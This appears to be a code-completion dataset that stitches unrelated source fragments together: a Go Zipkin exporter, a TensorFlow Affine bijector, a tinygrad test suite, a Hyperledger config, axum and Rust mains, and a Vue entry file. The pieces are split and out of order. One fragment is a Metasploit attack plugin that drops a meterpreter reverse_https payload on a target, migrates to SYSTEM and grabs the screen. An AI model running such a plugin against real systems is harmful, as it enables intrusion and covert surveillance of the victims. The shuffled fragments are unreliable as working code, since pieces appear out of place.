func toZipkinTags(data tracesdk.ReadOnlySpan) map[string]string {
attr := data.Attributes()
resourceAttr := data.Resource().Attributes()
m := make(map[string]string, len(attr)+len(resourceAttr)+len(extraZipkinTags))
for _, kv := range attr {
k, v := attributeToStringPair(kv)
m[k] = v
}
for _, kv := range resourceAttr {
k, v := attributeToStringPair(kv)
m[k] = v
}
if data.Status().Code != codes.Unset {
m["otel.status_code"] = data.Status().Code.String()
}
if data.Status().Code == codes.Error {
m["error"] = data.Status().Description
} else {
delete(m, "error")
}
if il := data.InstrumentationLibrary(); il.Name != "" {
m[keyInstrumentationLibraryName] = il.Name
if il.Version != "" {
m[keyInstrumentationLibraryVersion] = il.Version
}
}
if len(m) == 0 {
return nil
}
return m
}
// Rank determines selection order for remote endpoint. See the specification
// https://github.com/open-telemetry/opentelemetry-specification/blob/v1.0.1/specification/trace/sdk_exporters/zipkin.md#otlp---zipkin
var remoteEndpointKeyRank = map[attribute.Key]int{
semconv.PeerServiceKey: 0,
semconv.NetPeerNameKey: 1,
semconv.NetPeerIPKey: 2,
keyPeerHostname: 3,
keyPeerAddress: 4,
semconv.HTTPHostKey: 5,
semconv.DBNameKey: 6,
}
func toZipkinRemoteEndpoint(data tracesdk.ReadOnlySpan) *zkmodel.Endpoint {
// Should be set only for client or producer kind
if sk := data.SpanKind(); sk != trace.SpanKindClient && sk != trace.SpanKindProducer {
return nil
}
attr := data.Attributes()
var endpointAttr attribute.KeyValue
for _, kv := range attr {
rank, ok := remoteEndpointKeyRank[kv.Key]
if !ok {
continue
}
currentKeyRank, ok := remoteEndpointKeyRank[endpointAttr.Key]
if ok && rank < currentKeyRank {
endpointAttr = kv
} else if !ok {
endpointAttr = kv
}
}
if endpointAttr.Key == "" {
return nil
}
if endpointAttr.Key != semconv.NetPeerIPKey &&
endpointAttr.Value.Type() == attribute.STRING {
return &zkmodel.Endpoint{
ServiceName: endpointAttr.Value.AsString(),
}
}
return remoteEndpointPeerIPWithPort(endpointAttr.Value.AsString(), attr)
}
// Handles `net.peer.ip` remote endpoint separately (should include `net.peer.ip`
// as well, if available).
func remoteEndpointPeerIPWithPort(peerIP string, attrs []attribute.KeyValue) *zkmodel.Endpoint {
ip := net.ParseIP(peerIP)
if ip == nil {
return nil
}
endpoint := &zkmodel.Endpoint{}
// Determine if IPv4 or IPv6
if ip.To4() != nil {
endpoint.IPv4 = ip
} else {
endpoint.IPv6 = ip
}
for _, kv := range attrs {
if kv.Key == semconv.NetPeerPortKey {
port, _ := strconv.ParseUint(kv.Value.Emit(), 10, 16)
endpoint.Port = uint16(port)
return endpoint
}
}
return endpoint
} | case attribute.BOOLSLICE:
data, _ := json.Marshal(kv.Value.AsBoolSlice())
return (string)(kv.Key), (string)(data)
case attribute.INT64SLICE: |
affine_impl.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Affine bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import linalg
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.contrib.distributions.python.ops.shape import _DistributionShape
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import bijector
__all__ = [
"Affine",
]
def _as_tensor(x, name):
"""Convenience to convert to `Tensor` or leave as `None`."""
return None if x is None else ops.convert_to_tensor(x, name=name)
class Affine(bijector.Bijector):
"""Compute `Y = g(X; shift, scale) = scale @ X + shift`.
Here `scale = c * I + diag(D1) + tril(L) + V @ diag(D2) @ V.T`.
In TF parlance, the `scale` term is logically equivalent to:
```python
scale = (
scale_identity_multiplier * tf.diag(tf.ones(d)) +
tf.diag(scale_diag) +
scale_tril +
scale_perturb_factor @ diag(scale_perturb_diag) @
tf.transpose([scale_perturb_factor])
)
```
The `scale` term is applied without necessarily materializing constituent
matrices, i.e., the matmul is [matrix-free](
https://en.wikipedia.org/wiki/Matrix-free_methods) when possible.
Examples:
```python
# Y = X
b = Affine()
# Y = X + shift
b = Affine(shift=[1., 2, 3])
# Y = 2 * I @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_identity_multiplier=2.)
# Y = tf.diag(d1) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_diag=[-1., 2, 1]) # Implicitly 3x3.
# Y = (I + v * v.T) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_perturb_factor=[[1., 0],
[0, 1],
[1, 1]])
# Y = (diag(d1) + v * diag(d2) * v.T) @ X.T + shift
b = Affine(shift=[1., 2, 3],
scale_diag=[1., 3, 3], # Implicitly 3x3.
scale_perturb_diag=[2., 1], # Implicitly 2x2.
scale_perturb_factor=[[1., 0],
[0, 1],
[1, 1]])
```
"""
def __init__(self,
shift=None,
scale_identity_multiplier=None,
scale_diag=None,
scale_tril=None,
scale_perturb_factor=None,
scale_perturb_diag=None,
event_ndims=1,
validate_args=False,
name="affine"):
"""Instantiates the `Affine` bijector.
This `Bijector` is initialized with `shift` `Tensor` and `scale` arguments,
giving the forward operation:
```none
Y = g(X) = scale @ X + shift
```
where the `scale` term is logically equivalent to:
```python
scale = (
scale_identity_multiplier * tf.diag(tf.ones(d)) +
tf.diag(scale_diag) +
scale_tril +
scale_perturb_factor @ diag(scale_perturb_diag) @
tf.transpose([scale_perturb_factor])
)
```
If none of `scale_identity_multiplier`, `scale_diag`, or `scale_tril` are
specified then `scale += IdentityMatrix`. Otherwise specifying a
`scale` argument has the semantics of `scale += Expand(arg)`, i.e.,
`scale_diag != None` means `scale += tf.diag(scale_diag)`.
Args:
shift: Floating-point `Tensor`. If this is set to `None`, no shift is
applied.
scale_identity_multiplier: floating point rank 0 `Tensor` representing a
scaling done to the identity matrix.
When `scale_identity_multiplier = scale_diag = scale_tril = None` then
`scale += IdentityMatrix`. Otherwise no scaled-identity-matrix is added
to `scale`.
scale_diag: Floating-point `Tensor` representing the diagonal matrix.
`scale_diag` has shape [N1, N2, ... k], which represents a k x k
diagonal matrix.
When `None` no diagonal term is added to `scale`.
scale_tril: Floating-point `Tensor` representing the diagonal matrix.
`scale_diag` has shape [N1, N2, ... k, k], which represents a k x k
lower triangular matrix.
When `None` no `scale_tril` term is added to `scale`.
The upper triangular elements above the diagonal are ignored.
scale_perturb_factor: Floating-point `Tensor` representing factor matrix
with last two dimensions of shape `(k, r)`. When `None`, no rank-r
update is added to `scale`.
scale_perturb_diag: Floating-point `Tensor` representing the diagonal
matrix. `scale_perturb_diag` has shape [N1, N2, ... r], which
represents an `r x r` diagonal matrix. When `None` low rank updates will
take the form `scale_perturb_factor * scale_perturb_factor.T`.
event_ndims: Scalar `int` `Tensor` indicating the number of dimensions
associated with a particular draw from the distribution. Must be 0 or 1.
validate_args: Python `bool` indicating whether arguments should be
checked for correctness.
name: Python `str` name given to ops managed by this object.
Raises:
ValueError: if `perturb_diag` is specified but not `perturb_factor`.
TypeError: if `shift` has different `dtype` from `scale` arguments.
"""
self._graph_parents = []
self._name = name
self._validate_args = validate_args
# Ambiguous definition of low rank update.
if scale_perturb_diag is not None and scale_perturb_factor is None:
raise ValueError("When scale_perturb_diag is specified, "
"scale_perturb_factor must be specified.")
# Special case, only handling a scaled identity matrix. We don't know its
# dimensions, so this is special cased.
# We don't check identity_multiplier, since below we set it to 1. if all
# other scale args are None.
self._is_only_identity_multiplier = (scale_tril is None and
scale_diag is None and
scale_perturb_factor is None)
with self._name_scope("init", values=[
shift, scale_identity_multiplier, scale_diag, scale_tril,
scale_perturb_diag, scale_perturb_factor]):
event_ndims = ops.convert_to_tensor(event_ndims, name="event_ndims")
event_ndims_const = tensor_util.constant_value(event_ndims)
if event_ndims_const is not None and event_ndims_const not in (0, 1):
raise ValueError("event_ndims(%s) was not 0 or 1" % event_ndims_const)
else:
if validate_args:
# Shape tool will catch if event_ndims is negative.
event_ndims = control_flow_ops.with_dependencies(
[check_ops.assert_less(
event_ndims, 2, message="event_ndims must be 0 or 1")],
event_ndims)
if event_ndims_const == 0 and not self._is_only_identity_multiplier:
raise ValueError(
"If event_ndims == 0, the only scale argument you can pass is "
"scale_identity_multiplier. All others operate on vectors.")
# In the absence of `loc` and `scale`, we'll assume `dtype` is `float32`.
dtype = dtypes.float32
if shift is not None:
shift = ops.convert_to_tensor(shift, name="shift")
dtype = shift.dtype.base_dtype
self._shift = shift
# When no args are specified, pretend the scale matrix is the identity
# matrix.
if (self._is_only_identity_multiplier and
scale_identity_multiplier is None):
scale_identity_multiplier = ops.convert_to_tensor(1., dtype=dtype)
# self._create_scale_operator returns a LinearOperator in all cases
# except if self._is_only_identity_multiplier; in which case it
# returns a scalar Tensor.
scale = self._create_scale_operator(
identity_multiplier=scale_identity_multiplier,
diag=scale_diag,
tril=scale_tril,
perturb_diag=scale_perturb_diag,
perturb_factor=scale_perturb_factor,
shift=shift,
validate_args=validate_args)
if scale.dtype is not None:
dtype = scale.dtype.base_dtype
if scale is not None and not self._is_only_identity_multiplier:
if (shift is not None and
shift.dtype.base_dtype != scale.dtype.base_dtype):
raise TypeError(
"shift.dtype({}) is incompatible with scale.dtype({}).".format(
shift.dtype, scale.dtype))
if scale.tensor_rank is not None:
batch_ndims = scale.tensor_rank - 2
else:
batch_ndims = scale.tensor_rank_tensor() - 2
else:
# We won't need shape inference when scale is None or when scale is a
# scalar.
batch_ndims = 0
self._scale = scale
self._shaper = _DistributionShape(
batch_ndims=batch_ndims,
event_ndims=event_ndims,
validate_args=validate_args)
super(Affine, self).__init__(
event_ndims=event_ndims,
graph_parents=(
[event_ndims] +
[self._scale] if tensor_util.is_tensor(self._scale)
else self._scale.graph_parents +
[self._shift] if self._shift is not None else []),
is_constant_jacobian=True,
dtype=dtype,
validate_args=validate_args,
name=name)
def _create_scale_operator(self, identity_multiplier, diag, tril,
perturb_diag, perturb_factor, shift,
validate_args):
"""Construct `scale` from various components.
Args:
identity_multiplier: floating point rank 0 `Tensor` representing a scaling
done to the identity matrix.
diag: Floating-point `Tensor` representing the diagonal matrix.
`scale_diag` has shape [N1, N2, ... k], which represents a k x k
diagonal matrix.
tril: Floating-point `Tensor` representing the diagonal matrix.
`scale_tril` has shape [N1, N2, ... k], which represents a k x k lower
triangular matrix.
perturb_diag: Floating-point `Tensor` representing the diagonal matrix of
the low rank update.
perturb_factor: Floating-point `Tensor` representing factor matrix.
shift: Floating-point `Tensor` representing `shift in `scale @ X + shift`.
validate_args: Python `bool` indicating whether arguments should be
checked for correctness.
Returns:
scale. In the case of scaling by a constant, scale is a
floating point `Tensor`. Otherwise, scale is a `LinearOperator`.
Raises:
ValueError: if all of `tril`, `diag` and `identity_multiplier` are `None`.
"""
identity_multiplier = _as_tensor(identity_multiplier, "identity_multiplier")
diag = _as_tensor(diag, "diag")
tril = _as_tensor(tril, "tril")
perturb_diag = _as_tensor(perturb_diag, "perturb_diag")
perturb_factor = _as_tensor(perturb_factor, "perturb_factor")
# If possible, use the low rank update to infer the shape of
# the identity matrix, when scale represents a scaled identity matrix
# with a low rank update.
shape_hint = None
if perturb_factor is not None:
shape_hint = distribution_util.dimension_size(perturb_factor, axis=-2)
if self._is_only_identity_multiplier:
if validate_args:
return control_flow_ops.with_dependencies(
[check_ops.assert_none_equal(
identity_multiplier,
array_ops.zeros([], identity_multiplier.dtype),
["identity_multiplier should be non-zero."])],
identity_multiplier)
return identity_multiplier
scale = distribution_util.make_tril_scale(
loc=shift,
scale_tril=tril,
scale_diag=diag,
scale_identity_multiplier=identity_multiplier,
validate_args=validate_args,
assert_positive=False,
shape_hint=shape_hint)
if perturb_factor is not None:
return linalg.LinearOperatorUDVHUpdate(
scale,
u=perturb_factor,
diag_update=perturb_diag,
is_diag_update_positive=perturb_diag is None,
is_non_singular=True, # Implied by is_positive_definite=True.
is_self_adjoint=True,
is_positive_definite=True,
is_square=True)
return scale
@property
def shift(self):
"""The `shift` `Tensor` in `Y = scale @ X + shift`."""
return self._shift
@property
def scale(self):
"""The `scale` `LinearOperator` in `Y = scale @ X + shift`."""
return self._scale
def _forward(self, x):
y = x
if self._is_only_identity_multiplier:
y *= self._scale
if self.shift is not None:
return y + self.shift
return y
y, sample_shape = self._shaper.make_batch_of_event_sample_matrices(
y, expand_batch_dim=False)
with ops.control_dependencies(self._maybe_check_scale() if
self.validate_args else []):
y = self.scale.matmul(y)
y = self._shaper.undo_make_batch_of_event_sample_matrices(
y, sample_shape, expand_batch_dim=False)
if self.shift is not None:
y += self.shift
return y
def _inverse(self, y):
x = y
if self.shift is not None:
x -= self.shift
if self._is_only_identity_multiplier:
|
x, sample_shape = self._shaper.make_batch_of_event_sample_matrices(
x, expand_batch_dim=False)
# Solve fails if the op is singular so we may safely skip this assertion.
x = self.scale.solve(x)
x = self._shaper.undo_make_batch_of_event_sample_matrices(
x, sample_shape, expand_batch_dim=False)
return x
def _inverse_log_det_jacobian(self, y):
return -self._forward_log_det_jacobian(y)
def _forward_log_det_jacobian(self, x):
if self._is_only_identity_multiplier:
# We don't pad in this case and instead let the fldj be applied
# via broadcast.
event_size = distribution_util.pick_vector(
math_ops.equal(self._shaper.event_ndims, 0),
[1], array_ops.shape(x))[-1]
event_size = math_ops.cast(event_size, dtype=self._scale.dtype)
return math_ops.log(math_ops.abs(self._scale)) * event_size
return self.scale.log_abs_determinant()
def _maybe_check_scale(self):
try:
return [self.scale.assert_non_singular()]
except NotImplementedError:
pass
return []
| return x / self._scale |
configurebccsp.go | // +build pkcs11
/*
Copyright IBM Corp. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package util
import (
"path"
"strings"
"github.com/cloudflare/cfssl/log"
"github.com/hyperledger/fabric/bccsp/factory"
"github.com/hyperledger/fabric/bccsp/pkcs11"
"github.com/pkg/errors"
)
// ConfigureBCCSP configures BCCSP, using
func ConfigureBCCSP(optsPtr **factory.FactoryOpts, mspDir, homeDir string) error {
var err error
if optsPtr == nil {
return errors.New("nil argument not allowed")
}
opts := *optsPtr
if opts == nil {
opts = &factory.FactoryOpts{}
}
if opts.ProviderName == "" {
opts.ProviderName = "SW"
}
if strings.ToUpper(opts.ProviderName) == "SW" {
if opts.SwOpts == nil {
opts.SwOpts = &factory.SwOpts{}
}
if opts.SwOpts.HashFamily == "" {
opts.SwOpts.HashFamily = "SHA2"
}
if opts.SwOpts.SecLevel == 0 {
opts.SwOpts.SecLevel = 256
}
if opts.SwOpts.FileKeystore == nil {
opts.SwOpts.FileKeystore = &factory.FileKeystoreOpts{}
}
// The mspDir overrides the KeyStorePath; otherwise, if not set, set default
if mspDir != "" {
opts.SwOpts.FileKeystore.KeyStorePath = path.Join(mspDir, "keystore")
} else if opts.SwOpts.FileKeystore.KeyStorePath == "" {
opts.SwOpts.FileKeystore.KeyStorePath = path.Join("msp", "keystore")
}
} else if strings.ToUpper(opts.ProviderName) == "GMSW" {
if opts.SwOpts == nil {
opts.SwOpts = &factory.SwOpts{}
}
if opts.SwOpts.HashFamily == "" {
opts.SwOpts.HashFamily = "SHA2"
}
if opts.SwOpts.SecLevel == 0 {
opts.SwOpts.SecLevel = 256
}
if opts.SwOpts.FileKeystore == nil {
opts.SwOpts.FileKeystore = &factory.FileKeystoreOpts{}
}
// The mspDir overrides the KeyStorePath; otherwise, if not set, set default
if mspDir != "" {
opts.SwOpts.FileKeystore.KeyStorePath = path.Join(mspDir, "keystore")
} else if opts.SwOpts.FileKeystore.KeyStorePath == "" {
opts.SwOpts.FileKeystore.KeyStorePath = path.Join("msp", "keystore")
}
}
err = makeFileNamesAbsolute(opts, homeDir)
if err != nil {
return errors.WithMessage(err, "Failed to make BCCSP files absolute")
}
log.Debugf("Initializing BCCSP: %+v", opts)
if opts.SwOpts != nil {
log.Debugf("Initializing BCCSP with software options %+v", opts.SwOpts)
}
if opts.Pkcs11Opts != nil {
log.Debugf("Initializing BCCSP with PKCS11 options %+v", sanitizePKCS11Opts(*opts.Pkcs11Opts))
}
*optsPtr = opts
return nil
}
// redacts label and pin from PKCS11 opts
func sanitizePKCS11Opts(opts pkcs11.PKCS11Opts) pkcs11.PKCS11Opts {
mask := strings.Repeat("*", 6)
opts.Pin = mask
opts.Label = mask
return opts | } |
|
test_ops.py | import os
import torch
import numpy as np
import unittest
import timeit
import functools
from tinygrad.tensor import Tensor, DEFAULT_DEVICE, Device
def helper_test_op(shps, torch_fxn, tinygrad_fxn, atol=1e-6, rtol=1e-3, grad_atol=1e-6, grad_rtol=1e-3, forward_only=False, vals=None, a=-0.5, b=20):
torch.manual_seed(0)
if shps is None:
ts = [torch.tensor(x, requires_grad=True) for x in vals]
else:
ts = [torch.tensor((np.random.random(size=x).astype(np.float32)+a)*b, requires_grad=True) for x in shps]
tst = [Tensor(x.detach().numpy()) for x in ts]
out = torch_fxn(*ts)
ret = tinygrad_fxn(*tst)
np.testing.assert_allclose(ret.cpu().data, out.detach().numpy(), atol=atol, rtol=rtol)
if not forward_only:
out.mean().backward()
ret.mean().backward()
for t, tt in zip(ts, tst):
np.testing.assert_allclose(t.grad, tt.cpu().grad.data, atol=grad_atol, rtol=grad_rtol)
# speed
torch_fp = timeit.Timer(functools.partial(torch_fxn, *ts)).timeit(5) * 1000/5
tinygrad_fp = timeit.Timer(functools.partial(tinygrad_fxn, *tst)).timeit(5) * 1000/5
if not forward_only:
torch_fbp = timeit.Timer(functools.partial(lambda f,x: f(*x).mean().backward(), torch_fxn, ts)).timeit(5) * 1000/5
tinygrad_fbp = timeit.Timer(functools.partial(lambda f,x: f(*x).mean().backward(), tinygrad_fxn, tst)).timeit(5) * 1000/5
else:
torch_fbp, tinygrad_fbp = np.nan, np.nan
print("testing %30r torch/tinygrad fp: %.2f / %.2f ms bp: %.2f / %.2f ms" % (shps, torch_fp, tinygrad_fp, torch_fbp-torch_fp, tinygrad_fbp-tinygrad_fp))
class TestOps(unittest.TestCase):
def test_add(self):
helper_test_op([(45,65), (45,65)], lambda x,y: x+y, Tensor.add)
def test_sub(self):
helper_test_op([(45,65), (45,65)], lambda x,y: x-y, Tensor.sub)
def test_mul(self):
helper_test_op([(45,65), (45,65)], lambda x,y: x*y, Tensor.mul)
def | (self):
helper_test_op([(45,65), (45,65)], lambda x,y: x/y, Tensor.div)
def test_pow(self):
helper_test_op([(45,65), (45,65)], lambda x,y: x**y, Tensor.pow, a=0)
def test_sqrt(self):
helper_test_op([(45,65)], lambda x: x.sqrt(), Tensor.sqrt, a=0)
def test_relu(self):
helper_test_op([(45,65)], lambda x: x.relu(), Tensor.relu)
def test_leakyrelu(self):
helper_test_op([(45,65)], lambda x: torch.nn.functional.leaky_relu(x,0.01), Tensor.leakyrelu)
def test_abs(self):
helper_test_op([(45,65)], lambda x: torch.abs(x), Tensor.abs)
def test_log(self):
helper_test_op([(45,65)], lambda x: torch.log(x), Tensor.log)
def test_exp(self):
helper_test_op([(45,65)], lambda x: torch.exp(x), Tensor.exp)
def test_sign(self):
helper_test_op([(45,65)], lambda x: torch.sign(x), Tensor.sign)
def test_sigmoid(self):
helper_test_op([(45,65)], lambda x: x.sigmoid(), Tensor.sigmoid)
def test_softplus(self):
helper_test_op([(45,65)], lambda x: torch.nn.functional.softplus(x), Tensor.softplus, atol=1e-6, grad_atol=1e-6)
def test_relu6(self):
helper_test_op([(45,65)], lambda x: torch.nn.functional.relu6(x), Tensor.relu6)
def test_hardswish(self):
helper_test_op([(45,65)], lambda x: torch.nn.functional.hardswish(x), Tensor.hardswish, atol=1e-6, grad_atol=1e-6)
def test_mish(self):
def _mish_pytorch(x):
return x*torch.tanh(torch.nn.functional.softplus(x))
helper_test_op([(45,65)], _mish_pytorch, Tensor.mish, atol=1e-4)
def test_dot(self):
helper_test_op([(45,65), (65,100)], lambda x,y: x.matmul(y), Tensor.dot, atol=1e-4)
def test_multidot(self):
helper_test_op([(10,45,65), (10,65,45)], lambda x,y: x @ y, Tensor.dot, atol=1e-4)
helper_test_op([(3,3,45,65), (3,3,65,45)], lambda x,y: x @ y, Tensor.dot, atol=1e-4)
def test_sum(self):
helper_test_op([(45,3)], lambda x: x.sum(), Tensor.sum)
helper_test_op([(3,4,5,6)], lambda x: x.sum(axis=(1,2)), lambda x: Tensor.sum(x, axis=(1,2)))
helper_test_op([(3,4,5,6)], lambda x: x.sum(axis=1), lambda x: Tensor.sum(x, axis=1))
def test_max(self):
helper_test_op([(45,3)], lambda x: x.max(), Tensor.max)
helper_test_op([(45,3)], lambda x: x.max().mul(0.5), lambda x: Tensor.max(x).mul(0.5))
helper_test_op(None, lambda x: x.max().mul(0.5), lambda x: Tensor.max(x).mul(0.5),
vals=[
[[1.0,1.0,0.0,1.0]],
])
helper_test_op([(3,4,5,6)], lambda x: x.max(axis=1)[0], lambda x: Tensor.max(x, axis=1))
def test_mean_axis(self):
helper_test_op([(3,4,5,6)], lambda x: x.mean(axis=(1,2)), lambda x: Tensor.mean(x, axis=(1,2)))
def test_logsoftmax(self):
helper_test_op([(45,65)], lambda x: torch.nn.LogSoftmax(dim=1)(x), Tensor.logsoftmax, atol=1e-7, grad_atol=1e-7)
def test_tanh(self):
helper_test_op([(45,65)], lambda x: x.tanh(), Tensor.tanh, atol=1e-6, grad_atol=1e-6)
def test_topo_sort(self):
helper_test_op([(45,65)], lambda x: (x+x)*x, lambda x: x.add(x).mul(x), atol=1e-6, grad_atol=1e-6)
def test_scalar_mul(self):
helper_test_op([(45,65)], lambda x: x*2, lambda x: x*2)
def test_scalar_rmul(self):
helper_test_op([(45,65)], lambda x: 2*x, lambda x: 2*x)
def test_scalar_sub(self):
helper_test_op([(45,65)], lambda x: x-2, lambda x: x-2)
def test_scalar_rsub(self):
helper_test_op([(45,65)], lambda x: 2-x, lambda x: 2-x)
def test_broadcast_full(self):
for torch_op, tinygrad_op in [(torch.add, Tensor.add), (torch.sub, Tensor.sub), (torch.mul, Tensor.mul),
(torch.div, Tensor.div), (torch.pow, Tensor.pow)]:
for shapes in [((5,13,24,16), (5,1,24,1)), ((1,3,1,7,1), (2,1,5,1,8))]:
with self.subTest(op=torch_op.__name__, shapes=shapes):
helper_test_op(shapes, torch_op, tinygrad_op, a=-0.5 if tinygrad_op != Tensor.pow else 0.0)
def test_broadcast_partial(self):
for torch_op, tinygrad_op in [(torch.add, Tensor.add), (torch.sub, Tensor.sub), (torch.mul, Tensor.mul),
(torch.div, Tensor.div), (torch.pow, Tensor.pow)]:
for shapes in [((1,32,32,32), (1,32,1,1)), ((5,13,24,16,2), (1,13,24,1,1)),
((4,1), (4,5)), ((1,4), (5,4))]:
with self.subTest(op=torch_op.__name__, shapes=shapes):
# NOTE: ANE backwards?
helper_test_op(shapes, torch_op, tinygrad_op, a=-0.5 if tinygrad_op != Tensor.pow else 0.0)
def test_slice(self):
helper_test_op([(3,3,3,3)], lambda x: x[1:2], lambda x: x[1:2])
helper_test_op([(3,3,3,3)], lambda x: x[1:2, 1:2], lambda x: x[1:2, 1:2])
helper_test_op([(3,3,3,3)], lambda x: x[1:2, 1:2, 0:-1], lambda x: x[1:2, 1:2, 0:-1])
def test_pad2d(self):
helper_test_op([(3,3,3,3)], lambda x: torch.nn.functional.pad(x, (1,2,3,4)), lambda x: x.pad2d(padding=(1,2,3,4)))
def test_transpose(self):
helper_test_op([(3,3,3)], lambda x: x.transpose(1,2), lambda x: x.transpose(order=(0,2,1)))
# This is failing on GPU because the dim is too large
#helper_test_op([(21,22,23,24)], lambda x: x.movedim((3,0,2,1),(0,1,2,3)), lambda x: x.transpose(order=(3,0,2,1)))
helper_test_op([(3,4,5,6)], lambda x: x.movedim((3,2,1,0),(0,1,2,3)), lambda x: x.transpose(order=(3,2,1,0)))
def test_reshape(self):
helper_test_op([(4,3,6,6)], lambda x: torch.reshape(x, (-1,3,6,6)), lambda x: x.reshape(shape=(-1,3,6,6)))
helper_test_op([(4,3,6,6)], lambda x: torch.reshape(x, (-1,1,6,6)), lambda x: x.reshape(shape=(-1,1,6,6)))
def test_detach(self):
helper_test_op([(4,3,6,6)], lambda x: x.detach(), lambda x: x.detach(), forward_only=True)
def test_conv2d(self):
for bs in [1,8]:
for cin in [1,3]:
for groups in [1,3] if cin == 3 else [1]:
for H in [1,2,5]:
for W in [1,2,3,5]:
with self.subTest(batch_size=bs, channels=cin, groups=groups, height=H, width=W):
helper_test_op([(bs,cin,11,28), (6,cin//groups,H,W)],
lambda x,w: torch.nn.functional.conv2d(x,w,groups=groups).relu(),
lambda x,w: Tensor.conv2d(x,w,groups=groups).relu(), atol=1e-4, grad_rtol=1e-5)
def test_strided_conv2d(self):
bs = 4
cin = 3
H,W = 3,3
with self.subTest(stride := 2):
helper_test_op([(bs,cin,11,28), (4,cin,H,W)],
lambda x,w: torch.nn.functional.conv2d(x,w,stride=2).relu(),
lambda x,w: Tensor.conv2d(x,w,stride=stride).relu(), atol=1e-4)
with self.subTest(stride := (2,1)):
helper_test_op([(bs,cin,11,28), (4,cin,H,W)],
lambda x,w: torch.nn.functional.conv2d(x,w,stride=stride).relu(),
lambda x,w: Tensor.conv2d(x,w,stride=(2,1)).relu(), atol=1e-4)
def test_maxpool2d(self):
for ksz in [(2,2), (3,3), (3,2), (5,5), (5,1)]:
with self.subTest(kernel_size=ksz):
helper_test_op([(32,2,110,28)],
lambda x: torch.nn.functional.max_pool2d(x, kernel_size=ksz),
# TODO: why is this tolerance so high?
lambda x: Tensor.max_pool2d(x, kernel_size=ksz), grad_atol=1e-4)
def test_avgpool2d(self):
shape = (32,2,111,28)
for ksz in [(2,2), (3,3), (3,2), (5,5), (5,1), shape[2:]]:
with self.subTest(kernel_size=ksz):
helper_test_op([shape],
lambda x: torch.nn.functional.avg_pool2d(x, kernel_size=ksz),
lambda x: Tensor.avg_pool2d(x, kernel_size=ksz), rtol=1e-5)
def test_upsample2d_nearest(self):
for sf in [1, 2, 3, 4, 5]:
with self.subTest(scale_factor=sf):
helper_test_op([(32,2,110,28)],
lambda x: torch.nn.functional.interpolate(x, scale_factor=sf, mode='nearest'),
lambda x: Tensor.upsample_nearest2d(x, scale_factor=sf), forward_only=True)
if __name__ == '__main__':
unittest.main(verbosity=2)
| test_div |
metasploit_screengrab.py | #!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
class MetasploitScreengrabPlugin(AttackPlugin):
# Boilerplate
| name = "metasploit_screengrab"
description = "Grab a screenshot"
ttp = "T1055"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
self.metasploit.smart_infect(target,
payload=payload_type,
outfile=payload_name,
format="exe",
architecture="x64")
self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")
self.metasploit.screengrab(target)
return res |
|
main.rs | //! Run with
//!
//! ```not_rust
//! cargo run -p example-global-404-handler
//! ```
use axum::{
handler::{get, Handler},
http::StatusCode,
response::{Html, IntoResponse},
Router,
};
use std::net::SocketAddr;
#[tokio::main]
async fn main() {
// Set the RUST_LOG, if it hasn't been explicitly defined
if std::env::var_os("RUST_LOG").is_none() {
std::env::set_var("RUST_LOG", "example_global_404_handler=debug")
}
tracing_subscriber::fmt::init();
// build our application with a route
let app = Router::new().route("/", get(handler));
// make sure this is added as the very last thing
let app = app.or(handler_404.into_service());
// run it
let addr = SocketAddr::from(([127, 0, 0, 1], 3000));
tracing::debug!("listening on {}", addr);
axum::Server::bind(&addr)
.serve(app.into_make_service())
.await
.unwrap();
}
async fn handler() -> Html<&'static str> |
async fn handler_404() -> impl IntoResponse {
(StatusCode::NOT_FOUND, "nothing to see here")
}
| {
Html("<h1>Hello, World!</h1>")
} |
main.rs | use std::env;
mod ast;
mod executor;
mod parser;
mod scanner;
mod error;
fn | () {
let args: Vec<String> = env::args().collect();
if args.len() != 2 {
println!("Usage: {} [FILE]", args[0]);
return ();
}
let source_file = &args[1];
let source = std::fs::read_to_string(source_file).expect("Could not read file");
let mut scanner = scanner::Scanner::new(&source, "test");
let mut toks = vec![];
while let Some(tok) = scanner.scan_one() {
toks.push(tok);
}
let mut parser = parser::Parser::new(toks, &source, "test");
let ast = parser.parse();
let ast = ast
.into_iter()
.map(|sexpr| Box::new(ast::Expr::SExpr(*sexpr)))
.collect::<Vec<Box<ast::Expr>>>();
let astref = ast.iter().collect();
let mut executor = executor::Executor::new();
executor.execute(&astref);
}
| main |
test_0242.py | import pytest
from problems.problem_0242 import Solution
@pytest.mark.parametrize('test_input, expected', (
(('anagram', 'nagaram'), True),
(('rat', 'car'), False),
))
def test_is_anagram(test_input, expected):
| assert Solution.isAnagram(*test_input) == expected |
|
main.js | import 'animate.css'
import Vue from 'vue'
import App from './App.vue'
import Button from '@/widgets/button/element'
import Divider from '@/widgets/divider/element'
import Image from '@/widgets/image/element'
import Music from '@/widgets/music/element'
import Rect from '@/widgets/rect/element'
import Text from '@/widgets/text/element'
Vue.component(Button.name, Button)
Vue.component(Divider.name, Divider) |
Vue.config.productionTip = false
new Vue({
render: h => h(App),
